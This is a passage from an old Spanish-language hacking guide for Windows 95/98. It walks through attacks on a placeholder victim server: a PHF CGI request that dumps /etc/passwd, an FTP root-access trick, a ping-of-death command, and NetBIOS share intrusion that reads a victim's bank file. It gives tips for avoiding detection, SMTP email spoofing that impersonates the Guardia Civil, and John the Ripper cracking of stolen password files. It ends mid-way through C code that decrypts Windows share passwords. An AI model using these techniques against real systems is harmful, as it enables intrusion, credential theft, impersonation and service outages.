  nos saldra tres opciones, la primera "nombre de host" es donde queremos
  conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo
  tenemos "tipo de terminal" que no hace falta cambiarlo.

  El telnet es importante ya que es asi como entramos a una cuenta en un
  servidor y podremos hacer lo que tengamos permitido en el sistema.
  Logicamente entraremos en una cuenta si tenemos el login y password.

  4. Hacking Basico En Windows. 

  Por fin ya se a acabo el latazo de la explicacion de como moverse por
  win95/98. Ahora ya podemos empezar a jugar un poco por inet :), siempre
  por puro placer pero jamas con malos fines.

  En esta seccion os explicare varias maneras de hacking usando el win95/98 a
  pelo o sea sin utilizar ninguna herramienta externa.

   4-1. Phf.

  La primera tecnica ya es muy conocida y la verdad es que tendremos suerte
  si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay
  que saber buscar y tener paciencia.

  Para que esto nos funcione solo tenemos que tener un navegador instalado
  en nuesto win95/98, por defecto suele venir el IE o sea que no podras decir
  que no tienes, siempre y cuando hallas instalado los paquetes extras.

  Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que
  corra sobre unix (muchos). Conectamos con un servidor en cuestion,
  www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le
  aadimos:

  http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

  Como ya he dicho si todo sale bien nos aparecera el fichero de passwords
  del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto
  el PHF tiene muchas variantes por eso te aconsejo que busce algo que
  profundice en esta tecnica al igual que tambien busca informacion sobre
  el fichero passwd de unix para comprenderlo.

   4-2. Ftp.

  Antes ya te he explicado el funcionamiento del FTP de win95/98, ahora lo
  usaremos para sacer el fichero de password de un servidor. Desde una
  ventana del MS-DOS llamamos al programa FTP y escribimos:

  ftp> open victima.com
  Conect to victima.com
  220 victim.com FTP server ready.

  ftp> quote user ftp
  331 Guest login ok, send ident as password.

  ftp> quote cwd ~root
  530 Please login with USER and PASS.

  ftp> quote pass ftp
  230 Guest login ok, access restrictions apply.

  ftp> dir (o lo que querramos)

  Y como siempre es el caso si todo sale bien estaremos metidos en el
  sistema como root (en lenguaje unix significa el superusuario, o sea el
  que controla el servidor). Por desgracia esta tecnica es muy antigua por
  lo que mas seguro no funcionara pero todo es posible.

   4-3. Ping De La Muerte.

  Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir
  Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un
  servidor o sea que se desconecta de Internet y esto puede representar
  grandes perdidas a una empresa. Con esto solo os quiero decir que aunque
  aqui os lo explicare no es cuestion que lo useis por Internet atacando
  servidores.

  La utilidad Ping sirve principalmente para saber si un servidor esta activo
  y ademas podemos calcular el trafico en la red segun el tiempo de su
  respuesta. Basicamente se le envia un paquete a un servidor y este nos
  contesta, solo que si se le envia un paquete muy grande puede llegar
  desordenado, por lo que el servidor pide al origen que le vuelva a enviar
  una parte o la totalidad del paquete, por lo que se produce un datagrama
  del ping muy grande y producira su caida. Para ejecutar este ataque solo
  tenemos que escribir :

  c:\>ping -l 65510 victima.com 

  Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes
  de hacer tonterias leed la parte sobre seguridad de la guia.

   4-4. Recursos Compartidos.
   
  Como win95/98 NO tiene seguridad nos permite colarnos en el disco duro de
  otra persona por Internet y lo mejor del caso es que esta tecnica nos la
  proporciona los propios programas del win95/98. Por supuesto no todo es tan
  sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala
  configuracion del propio usuario al no configurar adecuadamente los
  recursos compartidos de su red corriendo sobre win95/98.

  Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador
  bien configurado, o sea el compartir recursos bien puesto y tambien tener
  el Netbios instalado. Para configurarlo, tenemos que tener activado la
  opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.
  SI por el caso la opcion esta desactivada simplemente pulsamos el boton de
  "aadir" y aadimos el servicio "Compartir ficheros e impresoras en redes
  Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion"
  en "Cliente para redes Microsoft". Tambien tiene que estar activado el
  "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso
  Telefonico a Redes->Conexion a Inet que usaremos->boton derecho->
  propiedades, debiendo estar activada la casilla "conectarse a la red".

  Ahora ya podemos ponernos manos a la obra, entonces volvemos a una
  ventana del MS-DOS y ejecutamos:

  c:\>nbtstat -A (IP DE LA VICTIMA)
 
    NetBIOS Remote Machine Name Table

    Name               Type         Status
    ---------------------------------------------
    VICTIMAMACHINE    <00>    UNIQUE     Registered
    VICTIMAGROUP      <00>    GROUP      Registered
    VICTIMAMACHINE    <03>    UNIQUE     Registered
    VICTIMAMACHINE    <20>    UNIQUE     Registered
    VICTIMAGROUP      <1E>    GROUP      Registered

    MAC Address = 44-45-53-54-00-00

  Cuando ejecutamos este comando nos saldra una tabla como esta y el
  primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes
  ver la maquina se llama VICTIMAMACHINE.

  Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso
  encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP
  y el nombre de la maquina en cuestion, esto seria de la siguiente forma:

  c:\>edit c:\windows\system32\LMHOSTS

    VICTIMAMACHINE

  Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos
  un comando para aadir el ordenador de la victima a nuestro Netbios y
  esto seria de la siguiente forma:
  
  c:\>NBTSTAT -R

  Ahora nos interesa saber que recursos comparte la victima y esto tampoco
  nos traera complicacion alguna:

  c:\>net view \\VICTIMAMACHINE

   Shared resources at \\VICTIMAMACHINE

   Sharename    Type         Comment
   -----------------------------------------
   BANCO        Disk

  Y como podemos observar comparte una carpeta llamada BANCO.

  Ahora ya podemos operar como si fuese una terminal mas en nuestra red local
  sobre win95/98. Ya solo nos queda ejecutar el comando que querramos, si por
  ejemplo queremos ver el contenido, solo tenemos que escribir:

  c:\> dir \\VICTIMAMACHINE\BANCO

  O para leer cualquier fichero de la carpeta:

  c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT

  Si queremos conectar al recurso compartido de forma grafica (o sea con
  una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar
  INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible
  si hemos aadido la VICTIMAMACHINE a una unidad de red a la que podamos
  llamar, deberemos ejecutar:

  c:\>NET USE e: \\MIPC\WINDOWS

  Esta tecnica solo funciona si la maquina remota ejecuta win95/98 o win 3.11
  y ademas comparte las carpetas sin contrasea en modo "Acceso a nivel
  compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase
  el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en
  esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina
  para que este autorizada, esto lo conseguiremos con el Regedit, por
  desgracia los sistemas win95/98 y OSR2 que estan ejecutando el Servidor Web
  Personal de Microsoft desactivan esta posibilidad de acceso remoto tras
  informar de la conveniencia de hacerlo al usuario, ya que el servidor web
  obliga a compartir carpetas aun sin tener red local.

  Logicamente un usuario que haya tenido el despiste de conectarse a Internet
  con carpetas compartidas no toma luego medidas de control sobre quien
  entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser
  pillados si por ejemplo un usuario ejecuta el programa Netwatch, que
  muestra los usuarios conectados a nuestra computadora en cada momento y por
  supuesto el nombre de las computadoras por lo que es aconsejable cambiar el
  nombre de nuestra computadora usando el Regedit. Si nuestra maquina se
  llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con
  el Regedit a un nombre menos sospechoso.

  Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra
  computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos
  una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se
  dara cuenta de nuestra entrada. Tambien hay que decir que si la
  VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo
  "hay otros usuarios conectados a su ordenador, si apaga se desconectaran"
  si ocurre esto seremos pillados.

  Decir que el comando Net, dispone de muchos parametros que nos puede ser
  utiles y ademas podemos jugar durante mucho tiempo con ellos :) los cuales
  son los siguientes:

  c:\>net /?

  For more information about a specific Microsoft NET
  command, type the command name followed by /?
  (for example, NET VIEW /?).

  NET CONFIG   Displays your current workgroup settings.
  NET DIAG     Runs the Microsoft Network Diagnostics program to
               display diagnostic information about your network.
  NET HELP     Provides information about commands and
               error messages.
  NET INIT     Loads protocol and network-adapter drivers without
               binding them to Protocol Manager.
  NET LOGOFF   Breaks the connection between your computer and
               the shared resources to which it is connected.
  NET LOGON    Identifies you as a member of a workgroup.
  NET PASSWORD Changes your logon password.
  NET PRINT    Displays information about print queues
               and controls print jobs.
  NET START    Starts services.
  NET STOP     Stops services.
  NET TIME     Displays the time on or synchronizes your computer's
               clock with the clock on a Microsoft Windows for
               Workgroups, Windows NT, Windows 95, or NetWare time server.
  NET USE      Connects to or disconnects from a shared
               resource or displays information about
               connections.
  NET VER      Displays the type and version number of the
               workgroup redirector you are using.
  NET VIEW     Displays a list of computers that share
               resources or a list of shared resources
               on a specific computer.
  The command was completed successfully.

  Pues aqui teneis todos los parametros disponibles del comando Net, por lo
  que solo nos queda jugar un rato para saber que es cada cosa. No es
  divertido si os lo explico todo.

   4-5. Fake Mail Con El Telnet.

  Esta tecnica nos ayuda a suplantar la direccion de correo electronica que
  querramos :). La verdad es que tiene pocos usos, en mi opinion debido a
  una serie de razones pero siempre puede servir para gastar una buena
  broma enviando aun amigo un mail del director de la Universidad diciendo
  que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la
  Guardia Civil.

  La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar
  unas ciertas medidas de seguridad, que ya explicare luego. Lo primero
  que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del
  Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner
  el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos
  a que nos conectemos a ese puerto, cuando conectemos nos saldra un
  mensaje y esta esperando a que pulsemoa alguna tecla:

    220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
    [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT) 

  Muchas veces lo que podemos hacer es escribir "help" y saldran todos los
  comandos, tambien podemos escribir "echo" y la maquina nos contestara que
  esta lista. Para escribir un mail hay que seguir una serie de pasos:

   mail from:gc.uco@mad.servicom.es <- ponemos de donde viene.

  El servidor nos contesta:

   250 <gc.uco@mad.servicom.es> ... Sender Okay 

  Ahora escribimos:

   rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.

  El servidor nos contesta:
 
   250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay 

  Ahora escribimos:

   data 

  El servidor nos contesta:

   354 Enter mail, end with "." on a line by itself 

  Ahora escribimos:

   To: nob_ody@xxxxxxxx.com 
   From: gc.uco@mad.servicom.es 
   Subject: Te querremos!! 
   Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te
   querremos fichar para el departamento.
                                              Direccion General de
                                                la Guardia Civil
   .  <- para terminar el mail.
 
  El servidor nos contesta:

   250 Mail accepted 

  Ahora escribimos:

   quit  <- ya esta todo listo :)

  Pues ves como es realmente simple!! Pero antes de empezar a jugar con
  esta tecnica tenemos que asegurarnos que el servidor de mail no regrista
  nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a
  alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail
  sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet
  sobre servidores que permiten hacer esto.

   4-6. Cambiando El Entorno.

  Esta tecnica no es que sea propia del hacking ya que solo sirve para
  cambiar la pantalla de inicio o la de finalizar windows. Los logos de
  windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros
  con extension SYS pero siguen siendo realmente BMP'S.

  El logo del principio de windows (ya sabes el de las nubes) lo podeis
  encontrar como:

  c:\>logo.sys

  Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo
  y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro
  grafico y si lo volvemos a quitar, usara el de siempre. El logo del final
  (cuando cierra windows) esta en el directorio windows y lo podemos
  encontrar como:

  c:\windows>logos.sys

  Logicamente es obligatorio que los graficos que querramos sustituir
  tengan de tamao 320x400 y sean ficheros BMP'S. Conviene que les pongamos
  el atributo de ocultos, que esto se hace con el comando Attrib, por
  ejemplo:

  c:\windows>attrib +h logos.sys <- lo oculta.

  c:\windows>attrib -h logos.sys <- lo hace visible.

   4-7. Finger.

  La utilidad Finger, muy usada en Unix, en realidad no esta disponible en
  Win95/98 pero como somos Hackers nosotros si que somos capaces desde
  Win95/98. Finger se utiliza para obtener informacion de un servidor. Puede
  parecer una tonteria pero es util, por ejemplo, podemos empezar a sacar los
  Login's de los usuarios y empezar a adivinar sus passwords, tambien podemos
  vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la
  ultima vez que estuvo, etc...) y asi muchas cosas.

  La verdad es que para usar el Finger usaremos cualquier navegador, IE o
  Netscape. Simplemete nos dirigimos a un url un poco especial, es un web
  que permite hacer Finger a cualquier host y nos deveulve los resultados.
  Esto se conoce como "Finger Gateway". El url del web es:

  http://www.hgp.med.umich.edu/cgi-bin/finger
   
   4-8. Whois.

  La utilidad Whois, al igual que Finger es muy comun en Unix y no esta
  disponible en Win95/98 pero comos somos asi de listos saldremos del apuro.
  Tambien sirve para pedir informacion de un servidor pero no el igual que
  Finger, ya que se diferencian en el tipo de informacion, el finger se suele
  utilizar mucho para buscar direcciones de correo mientras que el Whois,
  para averiguar informacion sobre un servidor en concreto.

  Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un
  host muy especial:

  c:\>telnet whois.internic.net

  Por supuesto Internic, una empresa privada norte ameriacana que se
  encarga de controlar los dominios de Internet, y podemos usar su base
  de datos para pedir informacion sobre un servidor.

  Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_
  del_servidor" y nos sacara la informacion.

   telnet InterNIC > whois aol.com
   Connecting to the rs Database . . . . . .
   Connected to the rs Database
   America Online (AOL-DOM)
   12100 Sunrise Valley Drive
   Reston, Virginia 22091
   USA

   Domain Name: AOL.COM

   Administrative Contact:
      O'Donnell, David B  (DBO3)  PMDAtropos@AOL.COM
      703/453-4255 (FAX) 703/453-4102
   Technical Contact, Zone Contact:
      America Online  (AOL-NOC)  trouble@aol.net
      703-453-5862
   Billing Contact:
      Barrett, Joe  (JB4302)  BarrettJG@AOL.COM
      703-453-4160 (FAX) 703-453-4001

   Record last updated on 13-Mar-97.
   Record created on 22-Jun-95.

   Domain servers in listed order:

   DNS-01.AOL.COM               152.163.199.42
   DNS-02.AOL.COM               152.163.199.56
   DNS-AOL.ANS.NET              198.83.210.28
  
  Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto
  es lo que nos ha sacado Internic. Al final podemos ver los dominios
  asociados a AOL. Pues sencillo y muy util, el whois.
                                                     
   4-9. Tracert.

  Esta utilidad que si esta implementada en Win95/98, nos sirve para calcular
  el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos
  saber por cuantos servidores pasa. Muy util para sacar posibles servidores
  victimas si nos llaman la atencion.

  Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert,
  a secas y nos sacara el menu de opciones disponible.

  c:\>tracert

  Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

  Options:
       -d                 Do not resolve addresses to hostnames.
       -h maximum_hops    Maximum number of hops to search for target.
       -j host-list       Loose source route along host-list.
       -w timeout         Wait timeout milliseconds for each reply.

  Pues como veis, no tiene ningun misterio las opciones del Tracert, por
  lo que ya aprendereis su uso con la experiencia. Ahora escribimos una
  direccion IP cuando invocamos al Tracert, de la siguente forma:

  c:\>tracert 198.83.210.28

  Tracing route to dns-aol.ans.net [198.83.210.28]
  over a maximum of 30 hops:

  1   *        *        *     Request timed out.
  2 138 ms  145 ms  135 ms 204.134.78.201
  3 212 ms  191 ms  181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
  4 166 ms  228 ms  189 ms enss365.nm.org [129.121.1.3]
  5 148 ms  138 ms  177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]
  6 284 ms  296 ms  178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
  7 298 ms  279 ms  277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
  8 238 ms  234 ms  263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
  9 301 ms  257 ms  250 ms dns-aol.ans.net [198.83.210.28]

  Trace complete.
  
  Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado
  al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.

   4-10. Winipcfg.

  Ejecutando este comando, nos saldra una ventana windows informandonos de
  los diferentes valores de nuestra red. Realmente util para verificar la
  configuracion.

   4-11. Ipconfig.

  Este programa es similar al anterior descrito pero funciona en modo MS-DOS.
  Al igual nos sirve para verificar la configuracion de nuestra red. Por
  ejemplo, lo ejecutamos asi:

  C:\WINDOWS>ipconfig

  Windows 98 IP Configuration

  0 Ethernet adapter :

          IP Address. . . . . . . . . : 0.0.0.0
          Subnet Mask . . . . . . . . : 0.0.0.0
          Default Gateway . . . . . . :

  Decir que en el ordenador donde estoy escribiendo este articulo, no lo
  tengo en estos momentos en red, por eso no lo tengo configurado. Para pedir
  las diferentes opciones, ejecutamos:

  C:\WINDOWS>ipconfig -h
  Windows 98 IP Configuration
  Command line options:
  /All - Display detailed information.
  /Batch [file] - Write to file or ./WINIPCFG.OUT
  /renew_all    - Renew   all adapters.
  /release_all  - Release all adapters.
  /renew   N    - Renew   adapter N.
  /release N    - Release adapter N.

  No veo la necesidad de traducir esto debido a que es realmente facil, en
  caso de no entender nada, aprende ingles :) Pero la que mas nos puede
  interesar es la opcion /All.

   4-12. Arp.

  Ejecutamos este comando para que nos muestre o para modificar nuestra IP
  en nuestra red, mantenida por un servidor Windows NT. Por ejemplo:

  C:\WINDOWS>arp

  Displays and modifies the IP-to-Physical address translation tables used by
  address resolution protocol (ARP).

  ARP -s inet_addr eth_addr [if_addr]
  ARP -d inet_addr [if_addr]
  ARP -a [inet_addr] [-N if_addr]

    -a          Displays current ARP entries by interrogating the current
                protocol data.  If inet_addr is specified, the IP and Physical
                addresses for only the specified computer are displayed.  If
                more than one network interface uses ARP, entries for each ARP
                table are displayed.
    -g          Same as -a.
    inet_addr   Specifies an internet address.
    -N if_addr  Displays the ARP entries for the network interface specified
                by if_addr.
    -d          Deletes the host specified by inet_addr.
    -s          Adds the host and associates the Internet address inet_addr
                with the Physical address eth_addr.  The Physical address is
                given as 6 hexadecimal bytes separated by hyphens. The entry
                is permanent.
    eth_addr    Specifies a physical address.
    if_addr     If present, this specifies the Internet address of the
                interface whose address translation table should be modified.
                If not present, the first applicable interface will be used.
  Example:
    > arp -s 157.55.85.212   00-aa-00-62-c6-09  .... Adds a static entry.
    > arp -a                                    .... Displays the arp table.

  Y como viene siendo habitual, os remito a aprender ingles y a jugar con las
  distintos parametros que tiene este comando.

   4-13. Route.

  Este comando nos permitira manejar la tabla local TCP/IP. Al igual que los
  demas comandos dispone de varios parametros, los cuales son los siguientes:

  C:\WINDOWS>route

  Manipulates network routing tables.

  ROUTE [-f] [command [destination] [MASK netmask] [gateway] [METRIC metric]]

    -f           Clears the routing tables of all gateway entries.  If this is
                 used in conjunction with one of the commands, the tables are
                 cleared prior to running the command.

    command      Must be one of four:
                   PRINT     Prints   a  route
                   ADD       Adds     a  route
                   DELETE    Deletes  a  route
                   CHANGE    Modifies an existing route

    destination  Specifies the destination host.

    MASK         Specifies that the next parameter is the 'netmask' value.

    netmask      Specifies a subnet mask value to be associated
                 with this route entry. If not specified, it defaults to
                 255.255.255.255.

    gateway      Specifies gateway.

    METRIC       Specifies that the next paramenter 'metric' is the
                 cost for this destination

  All symbolic names used for destination are looked up in the network
  database file NETWORKS. The symbolic names for gateway are looked up in the
  host name database file HOSTS.

  If the command is PRINT or DELETE, wildcards may be used for the destination
  and gateway, or the gateway argument may be omitted.
  Diagnostic Notes:
      Invalid MASK generates an error, that is when (DEST & MASK) != DEST.
      Example> route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1
               The route addition failed: 87

  Examples:

      > route PRINT
      > route   ADD 157.0.0.0     MASK 255.0.0.0   157.55.80.1 METRIC  3
                    ^destination       ^mask       ^gateway            ^metric
      > route PRINT
      > route DELETE 157.0.0.0
      > route PRINT

  Creo que queda bastante claro, incluso provee distintos ejemplos para
  familiarizarnos con este comando.

   4-14. Netstat.

  Este comando nos puede ser muy util para saber que conexiones tenemos
  activas en el momento de ejecutar este comando, para conexiones TCP/IP, lo
  ejecutamos asi, solo que en mi caso no saldra ya que no estoy conectado en
  este momento:

  C:\WINDOWS>netstat

  Active Connections

    Proto  Local Address          Foreign Address        State

  Como veis no sale nada, pero si lo ejecutais cuando esteis conectados, ya
  vereis :) Como siempre este comando dispone de varios parametros, que son
  los siguientes:

  C:\WINDOWS>netstat /?

  Displays protocol statistics and current TCP/IP network connections.

  NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

    -a          Displays all connections and listening ports.
    -e          Displays Ethernet statistics. This may be combined with the -s
                option.
    -n          Displays addresses and port numbers in numerical form.
    -p proto    Shows connections for the protocol specified by proto; proto
                may be TCP or UDP.  If used with the -s option to display
                per-protocol statistics, proto may be TCP, UDP, or IP.
    -r          Displays the routing table.
    -s          Displays per-protocol statistics.  By default, statistics are
                shown for TCP, UDP and IP; the -p option may be used to
                specify a subset of the default.
    interval    Redisplays selected statistics, pausing interval seconds
                between each display.  Press CTRL+C to stop redisplaying
                statistics.  If omitted, netstat will print the current
                configuration information once.

  Ya solo nos queda jugar con los distintos parametros y aprender :)

  5. Utilizacion De Tools.

  En esta seccion os explicare diferentes tools que podeis usar para hacking,
  por supuesto hay que buscarlas por Internet, no pondre el url para
  encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe,
  pero os dire como se llama el programa asi lo podras buscar ademas esto
  tambien te servira para que te espabiles y sepas buscar cosas por Internet.

  Logicamente esta guia es para win95/98 y los programas que explicare seran
  para win95/98 pero tambien me veo obligado a explicar varias tools que no
  son de win95/98 propiamente sino de MS-DOS pero que son necesarias y ademas
  corren en modo MS-DOS de win95/98.

   5-1. Skamwerks lab version 1.1b

  Este programa es un util herramienta que nos ayuda a crear de forma rapida
  virus macro, o sea para el Word. Tiene que estar instalado el Word para
  que este programa nos funcione.

  Al ejecutar el programa nos aparecera una ventana con 2 botones los caules
  son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".
  El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus
  de macro ya que nos moveremos por varios menus y crearemos un virus de
  forma rapida y facilmente. La otra opcion, "Advanced Users" es para
  aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya
  que podemos meter codigo Word basic directamente y asi crear un virus a
  nuestro gusto.

  Como este no es un curso sobre virus, no me voy a enrollar sobre la
  utilizacion exacta del programa. En mi opinion es un buen programa,
  en ingles :) programado en C++.

   5-2. WaReZ! Version 95.12.31

  Este programa es un cliente FTP que muestra los directorios ocultos en un
  servidor, util si nos metemos en algun sitio sospechoso. Como ya es
  costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL
  correctamente.

  Al igual que antes tampoco hay que explicar mucho sobre este programa ya
  que su Interface es igual que el cliente WS_FTP que suele ser muy familiar
  para todos, por lo que no encontraremos mucha dificultad en su manejo.

   5-3. John the ripper v1.4.

  Esta magnifica tool no es propiamente de win95/98 pero seria un pecado no
  hablar de ella, cuando corre sobre win95/98 de maravilla (bueno, dentro de
  lo que cabe :). John, como se le conoce, sirve para crackear un fichero
  unix de password (el conocido etc/passwd, como ya digo aprended algo de
  unix).

  Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer
  es usar el John para sacar cuentas, pero no solo basta esto sino tambien
  necesitamos un buen diccionario y una combinacion de suerte y paciencia.

  Supongamos que ya tenemos todo (fichero passwd, John y un diccionario),
  entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo
  llamamos sin nigun parametro nos saldran un listado de opciones, esto seria
  asi:

  c:\>john

  Usage: john [flags] [passwd files]
  Flags:-pwfile:<file>[,..]     specify passwd file(s)
        -wordfile:<file> -stdin wordlist mode, read words from <file> or stdin
        -rules                  enable rules for wordlist mode
        -incremental[:<mode>]   incremental mode [using john.ini entry <mode>]
        -single                 single crack mode
        -external:<mode>        external mode, using john.ini entry <mode>
        -restore[:<file>]       restore session [from <file>]
        -makechars:<file>       make a charset, <file> will be overwritten
        -show                   show cracked passwords
        -test                   perform a benchmark
        -users:<login|uid>[,..] crack this (these) user(s) only
        -shells:[!]<shell>[,..] crack users with this (these) shell(s) only
        -salts:[!]<count>      crack salts with at least <count> accounts only
        -lamesalts              assume plaintext passwords were used as salts
        -timeout:<time>         abort session after a period of <time> minutes
        -list                   list each word
        -beep -quiet            beep or don't beep when a password is found
        -noname -nohash        don't use memory for login names or hash tables
        -des -md5               force DES or MD5 mode

  Veis? :), y como siempre no explicare que es cada opcion os lo dejo para
  que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero,
  para ello escogermos la opcion "single", ya que el john no nos pedira
  un fichero de diccionario, si fuese el caso que no tenemos, ponemos:

  c:\>john -single passwd

  Y el John se pondra a trabajar, cuando halla acabo creara un fichero
  llamado "John.pot" donde se almacenaran los passwords encriptados con
  su correspodiente passwords desencriptado (esta definicion no es del
  todo correcta pero es para que lo entendais) y ya tenemos unas cuentas
  de acceso al servidor.

  Este metodo va bien para la primera pasado con el John pero luego conviene
  usar un diccionario y con el diccionario seria de la siguiente manera:

  c:\>john -wordfile:spain.txt passwd

  El John seguiria el mismo proceso antes descrito, por supuesto si el
  fichero "John.pot" esta creado ya, les aadira los resultados obtenidos
  a este fichero, por cierto este fichero tiene atributo de solo lectura.

  Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis
  a manejar correctamente. Referente a los diccionarios hay varias
  herramientas que corren bajo MS-DOS que crean diccionarios o tambien
  podeis buscar por Internet ya que hay varios web's llenos de diccionarios.

  Decir que la ultima version del John The Ripper es la 1.5.

   5-4. Gobbler v 2.1.

  Volvemos a la carga con otro programa que no es del win95/98 propiamente,
  pero es un sniffer que podemos usar bajo win95 en una red Ethernet. Un
  Sniffer para aquellos que no sepan, es un programa que captura los paquetes 
  que pasan por una red y asi se pueden conseguir logins, passowrds u otro
  tipo de informacion que querramos, logicamente si los paquetes estan
  encriptados, esto dificultara el proceso, ya que habra que desencriptarlos
  si se puede.
                                                             
  Como siempre abrimos una ventana y ejecutamos el programa de la siguiente
  manera:

  c:\>gobbler

  Y se activara el programa y veremos una serie de ventanas, en este punto,
  pulsamos el <ESC> y saldra una ventana con un menu. Ahora tenemos que
  configurar el programa para nuestra red, la verdad es que es muy sencillo
  de utilizar, con un poco de practica dominaremos este sniffer facilmente.
  Como sugerencia conviene leer el fichero de documentacion que trae, ya
  que explica como configurar el programa.

   5-5. Sharepasswd.

  Este programa desencripta el passorwd de win95/98. Esta en lenguaje C, como
  supongo todo el mundo tiene que tener un compilador en C y si no ya estas
  buscando uno, que hay muchos y gratis por Internet. No veo la necesidad
  de explicaros el programa ya que tambien incluyo la explicacion del
  autor la cual esta muy bien, logicamente.

------------ Codigo Fuente ---------------------------------------------------

/* This program takes an 'encrypted' Windows 95 share password and decrypts it
 * Look at:
 * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
 * to find a machine's shares.  Within the data for each share are two
 * registry entries, Parm1enc and Parm2enc.  Parm1enc is the "Full access"
 * password.  Parm2enc is the "Read only" password.
 *
 * David Ross  2/9/96
 * snakey@cs.umd.edu
 *
 * Do not distribute this program for any commercial purpose without first
 * contacting me for permission.
 *
 * DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!
 *
 * A technical description of the 'code' can be found later on in this
 * document. 
 *
 * Oh yeah...  a totally unsolicited self promotion here...  If anyone has
 * a job for a junior year Computer Science student for summer '96, please
 * let me know!  I'm familiar with Windows and Mac networking (especially 
 * involving TCP/IP), fluent in C and C++, and working on becoming a
 * proficient Windows programmer.
 *
 */

#include <stdio.h>
#include <string.h>

#define BUFFER 30

int DecodeCharOne(unsigned char *);
int DecodeCharTwo(unsigned char *);
int DecodeCharThree(unsigned char *);
int DecodeCharFour(unsigned char *);
int DecodeCharFive(unsigned char *);
int DecodeCharSix(unsigned char *);
int DecodeCharSeven(unsigned char *);
int DecodeCharEight(unsigned char *);

main() {

  int i;           /* Generic counter */
  int eocc = 0;    /* Records if there has been an error */

  /* The following structure stores the encoded bytes.  Decoded values
   * replace the encoded values as the decoding process moves along
   * The initial values show here are not used and are unimportant
   */
  unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };
  unsigned short tempshort;   /* Used as a go-between from sscanf() to
				 mybytes[] so unaligned data accesses
				 don't occur */

  int goupto = 0;  /* Records how many characters there are to be decoded */
  
  /* The following code handles input */
  char inpt[BUFFER];
  char *inptptr;
  
  printf("Input the byte code in hex (ex: 76 d5 09 e3): ");
  fgets(inpt, BUFFER, stdin);
  
  inptptr = strtok(inpt, " ");
  if (inpt[0] != '\n')
    while ((inptptr != NULL) && (goupto < 8)) {
      sscanf(inptptr, "%hx", &tempshort);
      mybytes[goupto++] = tempshort;
      inptptr = strtok(NULL, " ");
    }
  
  /* Decode all the characters.  I could have made this stop immediately
   * after an error has been found, but it really doesn't matter
   */
  if (!DecodeCharOne(&mybytes[0])) eocc = 1;
  if (!DecodeCharTwo(&mybytes[1])) eocc = 1;
